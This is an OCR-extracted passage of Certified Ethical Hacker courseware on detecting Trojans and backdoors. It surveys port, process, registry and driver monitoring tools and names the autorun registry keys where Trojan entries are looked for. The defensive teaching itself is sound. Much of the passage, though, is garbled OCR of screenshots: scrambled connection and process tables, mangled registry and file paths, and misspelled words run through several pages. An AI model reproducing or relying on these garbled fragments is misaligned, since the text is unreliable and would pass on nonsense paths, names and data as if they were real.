Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

\ JM ft
File O p tio n s Pro ce ss V ie w

TC PView - Sysinternals: www.sysinternals.com
H elp

L ‫־‬J O x I
State TIM E W A IT E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D C L O S E W A IT E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D LIS T E N IN G LIS T E N IN G E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D S Y N S EN T SYN SEN T LIS T E N IN G LIS T E N IN G LIS T E N IN G ]"<‫־‬

Q

a

-< H
PID

Process ' ‫[ י‬System Proc... fg chrome.exe chrome.exe fg chrome.exe (• chrome.exe (? chrome.exe chrome.exe chrome.exe chrome.exe G chrome.exe chrome.exe <b edpr server.exe <b edpr_server.exe firefox.exe \ firefox.exe |) firefox.exe firefox.exe firefox.exe firefox.exe > googletalk.exe L^ ^ Bo o ale td k exe googletalk.exe a “ lsass.exe I “ Isass exe ” services.exe ■ — ‫׳‬---------‫ ־‬1

0
772 772 772 772 772 772 772 772 772 772 3380 3380 3876 3876 3876 3876 3876 3876 3688 3688 3688 644 644 636

t ) 1 ) f t ) <

Piolocol TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TC P TCP TCP TCP TC P TCP TCP TCPV6 TCP

Local Address win‫־‬msselck4k41 win-msselck4k41 W1rvmsselck4k41 win-msselck4k41 W1n-msselck4k41 win‫־‬msselck4k41 winmsselck4k41 win-msselck4k41 win-msselck4k41 win-msselck4k41 W1n‫־‬msselck4k41 W IN - M S S ELC K 4 K W l N -MS S E LCK4K.. W IN - M S S ELC K 4 K W l N -MS S E LCK4K.. win-msselck4k41 win*msselck4k41 win-msselck4k41 win-msselck4k41 win-msselck4k41 win-m:; elck4k41 win-msselck4k41 W IN - M S S ELC K 4 K win-msselck4k41 W IN - M S S ELC K 4 K
III

Local Port 4277 4164 4250 4251 4252 4274 4275 4276 4278 4279 4280 12121 12122 1051 1052 1082 4033 4266 4271 1195 4281 4282 1028 1028 1029

Remote Address 123.176.32.147 123.176.32.147 123.176.32.138 123.176.32.138 123.176.32.153 r-199-59-150-9. twt... vipl 3 Ib40 lond. co ... vipl 3. Ib40. lond. co ... 123.176.32.147 maa03s16-in-f27.1... maa03s16-in-f27 1... W l N -MS S E LCK4K... W IN - M SSELC K 4K ... localhost localhost hg-in-f189.1e100.... maa03s16-in-f22.1... maa03s16-in‫־‬f4.1e... maa03s16-in-f2.1 e... ni‫־‬in‫־‬f125.1 e100. net 74.125 236 189 maa03s16-in f29.1, . W IN •MS S E LCK4K... winmsselck4k41 W IN ■MS S E LCK4K...

Remote Port http http http http http http http http http http http 0 0 1052 1051 https https https https 5222 http http 0 0 0

« ‫׳‬N

=

V‫׳‬

End p o in ts: 69

Established: 22

Listening: 28

T im e W a it: 1

C lo se W a it: 1

I
FIGURE 6.49: TCPView Tool Screenshot

CurrPorts Tool
Source: http://www.nirsoft.net CurrPorts allows you to view a list of ports that are currently in use and the application that is using the ports. You can close a selected connection and also terminate the process using it, and export all or selected items to an HTML or text report. It displays the list of all currently opened TCP/IP and UDP ports on the system. For each port in the list, information about the process that opened the port is also displayed, including the process name, full path of the process, version information of the process (product name, file description, etc.), the time that the process was created, and the user who created it. It allows you to close unwanted TCP connections, kill the process that opened the ports, and save the TCP/UDP ports information to HTML file, XML file, or tab-delimited text file.
& Fit• Edit Vimw Oplioni H‫״‬iP CurrPorts

Proutt N«‫״‬ O System O System O System 0* System O System O System O System O System O System ® System O System O System 0 Unknown O Unknown O Unknown ® Unknown Unknown

PlOC«.. 864 1940 1940 90‫כ‬ 1376 864 476 1375 1940 1940 1940 9W 0 0 0 ‫ס‬ 0

Protocol UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP TCP TCP TCP TCP TCP

L ocjI Port 5C 0 190: 3702 3702 3702 450: 5355 51225 59293 5929a 62056 6205C 4924a 49245 49252 49253 4925a

lc«*i Pci. sakmp ‫ ״‬dp W5*SCO_ as -J sco •n-ifaca..

loc4l Add'au

R*n1

R«mot•,.. A

_

ipsec-mdt Imnr

[::1500 ]::‫[ו‬:1900 [::>3702 [::>3702 [::>3702 [::>4500 [::>5355 [::>53225 [fe80=b9ea:d01]::‫<ד‬59294 [::(62056 [::>62060 10.0.0.1249244 80 10.0.0.1249245 60 1000 1249252 S O 10.0.0.1249253 60 1000124925a S O NxV.fl r>p.—

http http http http http

v 1

53 Total Port* I Remote Conneetions, 1Seleeted

hMp-/'www.ni»»till.‫ווו‬

FIGURE 6.50: CurrPorts Tool Screenshot

Module 06 Page 951

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Scanning for Suspicious P rocesses
Trojans camouflage themselves as genuine Windows services or hide their processes to avoid detection

CEH

Process Monitor is a monitoring tool for Windows that shows file system, registry, and process/thread activity

Some Trojans use PEs (Portable Executable) to inject into various processes (such as explorer.exe or web browsers)

UHU
Process Monitor - Sysinternals: vrww.sysinternals.com
£ile Edit Event Filter Tools fip tio n s H elp

Processes are visible but looks like a legitimate processes and also helps bypass desktop firewalls

L*
Troe

Ll
P‫־‬ 0c«s3 Name

&

V i ©

I

I

£|a| ,, .l*!

Trojans can also use rootkit methods to hide their processes

Explorer EXE Explow EXE ^ Explorer EXE^ ‫ ו‬1:09:.. Explorer EXE* ^ 11:09:.. jbcpkxw tXE ^ j Ewkxw.EXE* 11:09:.. • ctrx* tx ■ ‫ור‬:09:.. cans .exe ^ ‫וד‬:09:.. ■‫!־‬cans.ece ‫וד‬:09:.. csns « e ■ 11:09:.. csrss exe ” 1

11:09:

3ID Operation Path Resit 5572 ^CreateFileMa... C:\Prcgram Hes * 86)\Nbz1 ll8 hnefo SUCCESS 5572 rftRogOponKoy HKLM\Scftwaro\MIo‫׳‬oooft\V/r‫ »״‬w SUCCESS' 5572 5572 5572 5572 548 548 548 548 548 >48 RegGHjeiyValueHKLMvSOFTWAREWaoMftXMftn.. NAME NO‫־‬ StRegOcseKey HKLM\S0 FTWARE\M1 cro5o ft\W n .. SUCCESS Create Hie C:\Progran Hes X»6>\Nbz1 lla hnto NAM ‫ ב‬NO ^ Q u c ty BasicInf.. .CAPregraai Ties xDG)\Mjulla Ffcefo .. SUCCESS & R # *d F I# C:\Window«\Syct*m32\cxee‫־‬ v dl SUCCESS ‫־‬ A Read Fie C :\Windows\System 32\csrs‫׳‬v dl SUCCESS RegQueryYalusHKLM\S0 FTWARE\M1 croscft\Win.. SUCCESS ‫׳‬tjk Read Fie C:\Windows\Systefn32\sxs.dll SUCCESS & Read He C:\W1ndows\System32\sxs.dll SUCCESS rftRwQucrvKcv HKLM SXCESS Backed by virtu a l m em ory

‫וו‬:‫מ‬:..

‫>וו‬ ‫מ‬..

1 1 j »_

Use process monitoring tools to detect hidden Trojans and backdoors

Showing 3S9,3T5 c f 662,305 events (54%)

http://technet.microsoft.com
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

S can n in g for S usp icio u s P ro c e sse s
There are various symptoms that can indicate that our system has been infected. The system suddenly becomes slow, downloading speed becomes slow, and the Internet's speed also comes down drastically. Attackers use certain rootkit methods to make the Trojan hide in the system where it can't be normally detected by antivirus software. These Trojans and worms usually enter into the system through pictures, music files, videos, etc. that are downloaded into the system. Initially, everything seems to be good but slowly they show effect in various ways. By using process monitoring tools, we can easily detect hidden Trojans, worms, and backdoors. Hidden Trojans and other kinds of vulnerabilities or viruses can be detected by scanning for suspicious processes.

P rocess Monitor
Source: http://technet.microsoft.com Process Monitor is a monitoring tool for Windows that shows real-time file system, Registry, and process/thread activity. It is used to analyze the behavior of spyware and dubious programs. Its features include rich and non-destructive filtering, comprehensive event

Module 06 Page 952

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

properties such as session IDs and user names, reliable process information, full thread stacks with integrated symbol support for each operation, simultaneous logging to a file, etc. Process Monitor ‫ ־‬Sysinternals: www.sysinternals.com
File Edit Event Filter Tools Options Help

Time

Process Name (Explorer.EXE _‫־‬ , Explorer.EXE ^(Explorer.EXE ,Explorer.EXE , Explorer.EXE 1 Explorer.EXE ■ 'csrss.exe ■ 'csrss.exe ■ 'csrss.exe ■ 'csrss.exe ■ 'csrss.exe
■ ' csrss.exe

11:09

<

PID 5572 5572 5572 5672 5572 5572 548 548 548 548 548 548

Operation Path Result ykCreateFileMa... C:\Program Files fc86)\M0zilla Firefo... SUCCESS rftRegOpenKey HKLM\Software\Microsoft\Window... SUCCESS 4 % RegQueryValueHKLM\SOFTWARE\Microsoft\Win... NAME NO‫־‬ ^RegQoseKey HKLM\SOFT\VARE\Microsoft\Win... SUCCESS [^Create File C:\Program Files fc86)\M0 zilla Firefo... NAME NO‫־‬ ykQuef>‫׳‬Basiclnf ..C:\Program Files fc86)\M0zilla Firefo... SUCCESS 2 ^ Read File C:\WrKJcws\Systern32\sxssrv.dll SUCCESS ^ Read File C:\Windows\System32\csrsrv.dll SUCCESS RegQueryValue HKLMXSO FTWAR E\Microsoft\Win... SUCCESS Read File C:\Windows\System32\sxs dll SUCCESS Read File C:\Windows\System32\sxs.dll SUCCESS rftReaQuervKev HKLM _____________ SUCCESS

&

III

>

Showing 359,375 of 652,305 events (54%)

Backed by virtual memory

FIGURE 6.51: Process Monitor

Module 06 Page 953

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

P rocess M onitoring Tool: W hat's R unning
J What's Running gives an inside look into your W indows operating systems

C EH

Microsoft

e

Inspect the processes and get performance and resource usage data such as memory usage, processor usage, and handles

e

Information about dlls loaded, services running within the process, and IPconnections associated with processes

Copyright 6 by EG-GtUIICil. All Rights Reserved. Reproduction is Strictly Prohibited

P ro c e ss M o n ito rin g Tool: W hat’s R u n n in g
^ Source: http://www.whatsrunning.net What's Running gives you an inside look into your Windows system, such as 2000/XP/2003/Vista/Windows7. It explores processes, services, modules, IP-connections, drivers, etc. through a simple-to-use application. 9
P r oc es s e s : It inspects the processes and gives performance and resource usage data such as memory usage, processor usage, and handles. It gives all the details about dll:s that are loaded, services that are running within the process, and the IP-connections each process has IP c o n n e c t i o n s : Services: Modules:

0 Q Q

It gives all the active IP connections in your system

Inspects the services that are running and stopped Finds out the information about all dll:s and exe:s that are in use on your

system

Module 06 Page 954

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Drivers: It finds out the information about all drivers, for running drivers you can inspect

the file version for finding the supplier of the drive
System information: It shows crucial system information about your system such as

installed memory, processor, registered user, and operating system and its version
W hat’s Running? 3.0
File View Startup Help Processes 79‫| ־‬ Snapshot Q $ ‫־‬ake snapshot Services ■ 1701Gl Modi es349‫^ |־‬ Proces. User Name 616 SYSTEM 564 SYSTEM 868 600 Administrator 3908 Administrator 3936 Administrator 4028 Admintstrator 3140 Administrator 2224 Administrator 1036 Administrator 1396 Administrator 3268 Administrator 3532 Administrator 4120 Admmstrator 4324 Admmstrator 4420 Admmstrator 4304 Admmstrator 4200 Administrator 3372 Admristrator 3304 Administrator 3404 Admintstrator 4708 Administrator w•:. ‫ ;־‬1 ■■:‫״‬-‫• ־״־־‬ :,:i 4872 Admintstrator 2700 Admmstrator 5096 Admmstrator 3600 Admmstrator 2580 Admmstrator 2240 Admintstrator CPU 0.0 0.0 * 0.0 0.0 00 00 00 00 00 * 00 * 00 00 * 00 00 00 00 00 00 * 00 0.0 0.0 0.0 IP Connections ■ 37 | * * Drivers• 279 | Q ‫ ״׳‬Startup-16 | System Info |

|□

t j Load Snapshot from file
Compare snap with sa... © Upload Snapshot to ...

_

Processes Start Process

X

o
3

Stop process Select Process columns View delta Icons Get nfo onlne

& Open folder
, J- ihow processes in Tree

A
rs-

Process Name lsass.exe wtnlogon.exe dwm.exe J explorer.exe igfxtray.exe hkcmd.exe igfxpers exe !{ft edpr_server.exe Q WinFLTray.exe M FLComServDrl.exe J Snagit32exe TscHelp.exe SnagPriv.exe C SnagitEdrtor exe splwow64.e. U hrefox exe P j P0WERPNT.EXE S mmc.exe vmconnect.exe googletalk exe !rt| EMET_notifier exe © chrome exe

Prod KA ► ► ► 1 1 1 E F F c c c ► F ► ► ► C E C C

1 ^ 1

‫! ■ ^ ^ י י י י זר ד ־ ׳ל^^א יקת‬
chrome.exe chrome.exe ^ chrome.exe ^ chrome.exe (£ ) chrome.exe £ ) chrome.exe

m n = c c c c o

Item 3 Process Properties Process ID Process Name Parent Process ID CPU Target ® Process 0 Memory Page Fault Count Peak Working Set,. Working Set Size Quota Peak Page,.. Quota Paged Pool... Quota Peak Non‫־‬.‫״‬ Quota NonPaged... Page Fie Usage Peak Page File Us... ® File Version 0 Time Creation Time Kernel Time User Time

4856 chrome.exe 4708 0.0 Win32

58907 45948 K 37900 K 232 K 225 K 25 K 25 K 32364 K 37436 K

@I/ O

10/2/2012 5:4203 PM 00:00:00:390 00:00:03:853

( 3 Ul Objects
,1 ^ Services (0) B [T Modules (46)

Update interval:! seconds

FIGURE 6.52: What's Running Tool Screenshot

Module 06 Page 955

Ethical Hacking and Countermeasures Copyright © by EC‫־‬C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Process Monitoring Tools
p i

CEH

h t t p :/ '/ w w w .t e a m c t i.c o m

PrcView

£•9

h t t p :/ / w w w .n e u b e r .c o m

Security Task Manager

‫־ ^ י‬ Yet Another (remote) Process Monitor

M

%

h ttp :/ / w w w .fe w b y te .c o m

Winsonar

C
4)

h ttp :/ / y a p r o c m o n .s o u r c e f o r g e .n e t

h ttp :/ / w w w .w e n p o in t .c o m

HiddenFinder

h t t p :/ / m m o n it .c o m

MONIT

h t t p :/ / t e c h n e t .m ic r o s o f t .c o m

Autoruns for Windows

h ttp :/ / t e c h n e t.m ic r o s o f t .c o m

Process Monitor

bF3

h t t p :/ / o r a n g e la m p s o f t w a r e .c o m

KillProcess

h t t p :/ / w w w .m a n a g e e n g in e .c o m

OpManager

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

P ro c e ss M o n ito rin g Tools
There are many process monitoring tools that you can use for the detection of Trojans installed on your system. These tools display a list of all the processes running or installed on your system. By analyzing the list you can identify the Trojans. These tools provide a comprehensive monitoring console for your entire network and IT infrastructure. They continuously and proactively monitor the entire IT system because of which any outages or performance degradations can be immediately identified and notified. In addition, it kills all the software that threatenss your computer, even if it is hidden. A few process monitoring tools are listed as follows:
9 9 9 9 9 9

PrcView available at http://www.teamcti.com Winsonar available at http://www.fewbvte.com HiddenFinder available at http://www.wenpoint.com Autoruns for Windows available at http://technet.microsoft.com KillProcess available at http://orangelampsoftware.com Security Task Manager available at http://www.neuber.com Yet Another (remote) Process Monitor available at http://yaprocmon.sourceforge.net MONIT available at http://mmonit.com Process Monitor available at http://technet.microsoft.com OpManager available at http://www.manageengine.com
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

9
9 9 9

Module 06 Page 956

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Scanning for Suspicious
F n iv ta c
J
Windows automatically executes instructions in

e Run

F in d sr e g is tr ye r r o r s ,u n n e e d e d r e g is tr y ju n k a n dh e lp sind e te c tin gr e g is tr ye n tr ie sc r e a te d b yT r o ja n s

e

RunServices
|N * o rd rK te ry X :C :« V n d » w 1 \ir« trf» \{A C X a < k M7 » 0 ‫ י‬U» 7 « 4 A A 1
N R Uaid o thertab E:vA«J»tatonsprt ?« :» lPspav 3nW _‫״‬x/t-arvct N R U81> ‫י‬o therhat C:'LMer5\AJmr1SrabrOedctooVrtfoi Setui IS O .1j N RUa<d>ttKr)1 at1 C^I>e»VUm raM >ak»«aktopr«t« o> Sc«w> IS C1. N R Uanti o thertat E:Vfe pfcato nt'Asctcason'freb* Set«9.0.1re NIKI trti ottw tat F• \A e p tr»tn ‫׳‬wVksplr»tar*'FrH»» # 1re

e RunOnce e RunServicesOnce S HKEY_CLASSES_ROOT\exefil e\shell\open\command

"%1" %*.
sections of registry J Scanning registry values for suspicious entries may indicate the Trojan infection J Trojans insert instructions at these sections of registry to perform malicious activities

http://www.macecraft.com

Cbpyright © by EC-CMBCil. All Rights Jte$ervei;Reproduction is Strictly Prohibited.

^23‫ ־־‬S canning for S uspicious R e g istry E n tries
— When a Trojan gets installed on the victim's machine, it generates a registry entry. W e can notice various changes; the first symptom is the system gets slower. Various advertisements keep popping up. So, scanning suspicious registries will help in detecting Trojans. Windows automatically executes instructions in the following sections of the registry:

© 9 © 9 Q

Run RunServices RunOnce RunServicesOnce HKEY_CLASSES_ROOT\exefile\shell\open\command "%1" %*

Scanning registry values for suspicious entries may indicate a Trojan infection. Trojans insert instructions at these sections of the registry to perform malicious activities.

r ‫ר‬ |J j k jv l6 PowerTools 2012 -R egistry C leaner
Source: http://www.macecraft.com jvl6 PowerTools 2012 is the ultimate registry cleaner used to find registry errors and unneeded registry junk and helps in detecting registry entries created by Trojans.

Module 06 Page 957

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

jv16 PowerTools 2012 [W8-x64] - Registry Cleaner
Fte
Key Entry’s name Value Entry last modified Error seventy Error descripbon Fie reference Tags Key / □ Q Entry's name Value Entry last modified Errcr severity Error desenpton 71 — Fie or drectory ‫־‬C: C:\Wmdows\Installer',{AC76BA86-7AD7-1033-7B44-A95000000001>\XFDFFieJ NRU and other htst<Er'Applications'Pell j4028r l\pisplay\Intel_multi-device_A09_R307992.exe MRU and other hist( C:\Users \Administratorpesktop^irefox Setup 15.0. l.exe MRU and other hist( C:VJsers\Administratorpesktop^iref6x Setup 15.0. l.exe 2 5% 2 5% 2 5% 25% MRU and other hist« E:\Applications\AppliationsV= iref6x Setup 9.0. Lexe MRU and other hish E:\Appiications\Applications^irefox Setup 9.0. Lexe MRU and other hist( CiV^ogr am Files (x86)\Atelier Web Remote Commander Pro\awrcp.exe MRU and other hist( CrV^ogram Files (x86)\Atelier WebV^emote Commander Pro\awrcp.exe

Select

Iools

Help
HKCRV-ocal Settings^oftwareWicrcsoft\W ndows\ShelV*mCa:he\ D: \CEH■T:> ls\SaltyBee.Exe.FriendlyAppName

0

1

SaltyBee 01.10.2012,05:02 25 MRU and other history data

D:\CEH-T30lsV5altyBee.Exe

ReasDn for detection Invalid file reference

In valid file or directory reference C:\Wi1 dows\Ins tallerYJAC76BA8 20.09.2012, 0 7 :%

□ HCCR\ ® □ □ □ □ □ □

HtCR\ E:\Applicali0ns Intel_mul6-<tevice_A09_R30799 01.10.2012, 05:02 HKG^C:VJsers\Admir Firefox HKCR^C: VJsers\Admir Mozilla «< ‫ ץ?ב‬E:\Applications Firefox HKCR^ E:\Applications Mozilla 01.10.2012, 05:02 01.10.2012, 05:02 01.10.2012, 05:02 01.10.2012, 05:02

HKCR^C:\Program File Atelie‫ ־‬Web Remote Commander 01.10.2012, 05:02 01.10.2012, 05:02 01.10.2012,05:02 | 01.10.2012, 05:02 01.10.2012, 05:02

□ HKCR^ C: \Program File AtelieWeb Software

I KCR^ D:\CEH-Tools\S SaltyBee
□ HKCR\C:\Users\Admir SaltyBee □ □ □ HKCR\D:\CEH-Tools\C wireshark-win32-1.4.2.exe

2 5% 2 5% 25% 2 5% 2 5%

MRU and

other Ns& C : YJsers \Admm1stra tor downloads V.os tD00r_v 6\SaltyBee.Exe

MRU and other hist( D:\CEH-T00ls\CEHv8 Module 10 Denial of Service \Wireshark\w1reshark-vwn32-l. MRU and MRU and MRU and MRU and other hist( C:\Users\Admm1stratorpownloads\vs_premium.exe other hist( C : VJsers \Admm1s tra tor downloads \vsjxemium.exe other hist( E: \Appl1cabons^)ell j4028r lpisplay\Intel_multi-device_A09_R307992.exe

HKCf^ C:\Users\AdmirMicrosoft Visual Studio Premium 01.10.2012, 05:02 HKCR\C:\Users\Admir Microsoft Corporation 01.10.2012, 05:02

□ HKOA E:\Appl1cations Intel.multi^evlce_A09_R30799 01.10.2012, 05:02 □ HKCU^C:\Users\Admir Firefox < 01.10.2012, 05:02 III

6%

1

other hist( GVUsersVAdmmistratorVDesktop^irefox setup 15.0. l.exe >

Custom fix... Selected: 0, highlighted: 1‫ ׳‬total: 1492

| f

Fix

Delete

Oose

J

FIGURE 6.53: j v l 6 PowerTools 2012 -Registry Cleaner

Module 06 Page 958

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

-X R eg istry E ntry M o n ito rin g Tool: PC Tools R eg istry ^ M e c h a n ic
Source: http://www.pctools.com PC Tools Registry Mechanic is an advanced registry cleaner that scans the registry values for suspicious entries created by Trojan infections. It fixes the Windows error and improves your system speed and maximizes software performance. It cleans up your system and secures your personal privacy. It keeps all your Internet and PC activities private and erases sensitive information permanently.

Module 06 Page 959

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

PC To o ls | R egistry Mechanic

PC T o o ls | R eg istry M echanic

FIGURE 6.54: PC Tools Registry Mechanic Tool Screenshot

Module 06 Page 960

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

R egistry Entry M onitoring Tools
5

CIE H

h ttp :/ / w w w .c h e m t a b le .c o m

Reg Organizer

1

Irnm

h t t p :/ / w w w .ja c o b s m .c o m

M J Registry Watcher

h t t p :/ / w w w .r e g is t r y s h o w e r .c o m

Registry Shower

h t t p :/ / w w w .d e v ic e lo c k .c o m

Active Registry Monitor

I

1____j

h t t p :/ / w w w .c o m o d o .c o m

Comodo Cloud Scanner

h t t p :/ / w w w .lc ib r o s s o lu t io n s .c o m

SpyM e Tools

h ttp :/ / b s a .is o ftw a r e .n l

Buster Sandbox Analyzer

&

h t t p :/ / r e g s h o t .s o u r c e fo r g e .n e t

Regshot

La\

h ttp :/ / w w w .fo r t e g o .c o m

All-Seeing Eyes

&

h ttp :/ / le e lu s o ft.b lo g s p o t .in

Registry Live Watch

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

R eg istry E ntry M o n ito rin g Tools
In addition to jvl6 PowerTools 2012 - Registry Cleaner and PC Tools Registry Mechanic, there are many other tools that allow you to monitor registry entries and thus help detect Trojans installed, if any. A few of the registry entry monitoring tools that are mainly used for the purpose of cleaning the registry are listed as follows: 0 0 0 0 0 0 0 0 0 0 Reg Organizer available at http://www.chemtable.com Registry Shower available at http://www.registryshower.com Comodo Cloud Scanner available at http://www.comodo.com Buster Sandbox Analyzer available at http://bsa.isoftware.nl All-Seeing Eyes available at http://www.fortego.com MJ Registry Watcher available at http://www.jacobsm.com Active Registry Monitor available at http://www.devicelock.com SpyMe Tools available at http://www.lcibrossolutions.com Regshot available at http://regshot.sourceforge.net Registry Live Watch available at http://leelusoft.blogspot.in

Module 06 Page 961

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Scanning for Suspicious Device D rivers
Trojan Device Driver

CEH

S cannin g for S uspicious D evice D riv ers
When device drivers are downloaded from various sources that are not trustworthy Trojans may also get installed on the system. Trojans use these devices as covers to hide but by using device driver monitoring tools, we can identify if there is any Trojan present. Trojans are installed along with device drivers downloaded from untrusted sources and use these drivers as a shield to avoid detection. Scan for suspicious device drivers and verify if they are genuine and downloaded from the publisher's original site.

Module 06 Page 962

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Trojan Device Driver

cdrom.sys

System information M . M* *•. H■* Sy1t*n Stm vr 2 P«e> jrc*< ■ [OTpcnwa - ScftHft Emvcmot Emormtnl ViTMbkt Nrt*Cft C&vyflore Ovrrptor 3‫ז‬W OKI Com pInn* H c‫«׳‬ Jwif* W »Cf040« ACH CfMf M KTCfOd ACUfcl O riV C f ACft Procvttcr Aggr«o*or.. A CMfowtr Meter Dretr A CM Wjkt Alwm Cfr.tf adit «d^a *dptfca •dpotTO Xn‫״‬ll«1j fuirto‫ ״‬Clr.tr (0«._ H « ACf Brt f«cr 1M) Ki PtMMW Dnnr AN©► r®l«»»o» Dirr*' *flxSuU *nvlibt cyandowsMc\*«nd0‫*\ז*י‬.c\w«t40wf\c.. CAwnaows'i.. c\v«ndowfi.c\ma40w *\sCVwtfowiUcWwviows's c\wan40wf\s~ e\w 1ndow»\»~ rvw*«40v<\< CVnntowfS*.. c\v»ndcm\srVwm dowtH c\*nntfow »\»‫״‬ e\*m4av%\* mo □ u » rf <«Ug«ry O n*, O <rt«gery n»m »t o n ty Tyr* M‫׳‬nH Drwi KcmHOnrfr K«m t< 0*r.*r KcmH D m t Ktmri Drwtr Kemtl Dover K*»nrt Dnrff Kamri 0‫« ״‬ K«mrl O w KtmH Dnrft r#mM Pm*( KimHOn■*• KtmH Orw K«m«l D*w *‫׳‬ Ktrnri Otnet K«mri Orw K«Ml Brt* * N O N O VK m No No N O m No N O N O V»» N O No No N O No

*P* i:p*x *rpoagr

S4rac« Program V -> up * *o?•m, OU R*9«tfJbCf• Wntort Iror *♦pertryj

*IptfKl

.jpUO •ncfca •1<d1yn •nduu M W fctH

v

UOM’W d

Go to Run ‫־‬ ‫־‬ > Type m s i n f 032 ‫־‬ ‫־‬ ^ Software Environment ‫ >־־‬System Drivers

Attacker

FIGURE 6.55: Scanning for Suspicious Device Drivers

Module 06 Page 963

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

D evice D rivers M onitoring Tool: DriverView
J

CEH

DriverView utility displays the list of all device drivers currently loaded on system. For each driver in the list, additional information is displayed such as load address of the driver, description, version, product name, company that created the driver, etc.

DnverView File Edit View Options Help fa eg •3J 8 ‫־‬ Address 0005X00X St9 0 0 0 000:0000X-ffOX 0000x 000P09000 000X00000162000 0000x 0016»»00 0000x 00 ‫ו‬t‫?׳‬t90 0 0 0005X00 6 9‫ו‬D O O O O 000x1 000 16 901 00 0 0000x0016933000 0000X00 1 & 9 W 0 0 0 000X000 1 6 8 1 2 0 0 0 000:000016900000
oooooootsfqooo

L

d cdd.dti 9 TSDDDdll # winJ2k.sys 9 pa1sthtupe11e1.1ys ® vhdparsei.sys ® atyncmac syt » WPR0.4IJ001.jyj ‫י‬ * wv.iyi ♦ srv2.syt ♦ vhdmp.tyl • Fj0 epend1.sy* « ‫י*ימ>י‬9•*(* ♦ wvneUys ■ >'dpdi.tyi ‫י‬ » npf.eyt O NIProbeMenvSYS O WnVDfdrvG.tys * HTTP.syt < >lunparsei.sys ‫י‬ 3 ‫ י‬eondrvsys # storpott.jys # WmVDEdrv.sys mrjsmbiOiVj 1 5 5 item(i), 1Selected

See tkOXttWOC C kO XJb O O C 010X09000 < M X !3 cd 0 a> C h Q X X to O P 1 } (M naO aO O G (k O C O O c O O O C ttX O O c O O C U O O O M O O O o>axaoooc 0 1 0 0 0 1 2 0 0 0 * 00 01 2 0 0 0

Load2 1 1 5 1 1 1 1 1 1

1

0000X001if9K)00 B»»W)'JIMOOO 000X000 1M U O O O 000X000 1M S7000 0000X00'5r4 8 0 0 C 0000x0015H9000 0000X001£ 3 8 0 0 0 ‫צ‬ 000X000 OICOOX 000x 000 isrooooo 0000X00 15WEM0 000x0001‫צ‬0‫צ‬ £0‫כ‬ 0 0000x 001> D 2yox

2 ‫ו‬ j (W X O C fcO O O 1 O 0 O O J1 O O O 1 ftOWPcttH 1 04000000 1 * 0000000 ‫ו‬ 04X0*1000 1 O k OXCMOO 1 1vy ‫׳‬x<w» 1 fraowooc ‫ו‬ O&OttOOC 1 <kX03900c ‫ו‬

Inc*‫ג‬ 12 s 1 2 4 1 2 3 ‫ ו‬2‫ו‬ 1 Si •*? 1 4 S 1 4 7 1 4 6 1 4 5 1 5 1 1 5 0 1 4 2 1 4 1 1 4 0 l» 1 1 7 1 3 6 IB 1 1 4 1 5 4 1 4 3 "‫־‬ 1 4 4 ■‫״‬

